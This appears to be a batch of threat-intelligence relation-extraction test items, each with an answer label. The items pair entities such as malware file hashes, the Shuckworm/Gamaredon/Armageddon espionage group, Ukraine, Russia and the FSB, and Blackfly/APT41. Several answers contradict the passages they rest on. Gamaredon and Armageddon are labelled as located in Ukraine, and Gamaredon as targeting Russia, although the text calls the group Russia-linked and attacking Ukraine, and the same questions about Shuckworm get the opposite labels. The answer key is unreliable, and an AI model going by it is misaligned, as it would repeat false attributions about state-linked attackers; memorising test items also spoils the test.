* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
### Target Entity: USB propagation scripts
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
### Target Entity: USB propagation scripts
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
### Target Entity: USB propagation scripts
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
### Target Entity: USB propagation scripts
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
### Target Entity: USB propagation scripts
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
### Target Entity: LNK files
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Gamaredon
### Target Entity: FSB
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Ukraine
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Russia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>located-at</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Russian Federal Security Service
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: FSB
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Gamaredon
### Target Entity: Ukraine
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>located-at</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Armageddon
### Target Entity: Ukraine
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>located-at</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Gamaredon
### Target Entity: Russia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Gamaredon
### Target Entity: Russian Federal Security Service
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Gamaredon
### Target Entity: FSB
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Armageddon
### Target Entity: Russia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>located-at</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Armageddon
### Target Entity: Russian Federal Security Service
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Armageddon
### Target Entity: FSB
### Possible Relationship Labels:
['targets', 'impersonates', 'attributed-to', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>attributed-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Russian Federal Security Service
### Target Entity: Russia
### Possible Relationship Labels:
['located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>located-at</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
FSB
### Target Entity: Russia
### Possible Relationship Labels:
['located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>located-at</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Ukraine
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Attackers heavily focused on acquiring military and security intelligence in order to support invading forces.
The Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
Shuckworm (Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Asia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Blackfly: Espionage Group Targets Materials Technology
Group targets multiple subsidiaries of single Asian conglomerate.
The Blackfly espionage group (APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
APT41
### Target Entity: Asia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Blackfly: Espionage Group Targets Materials Technology
Group targets multiple subsidiaries of single Asian conglomerate.
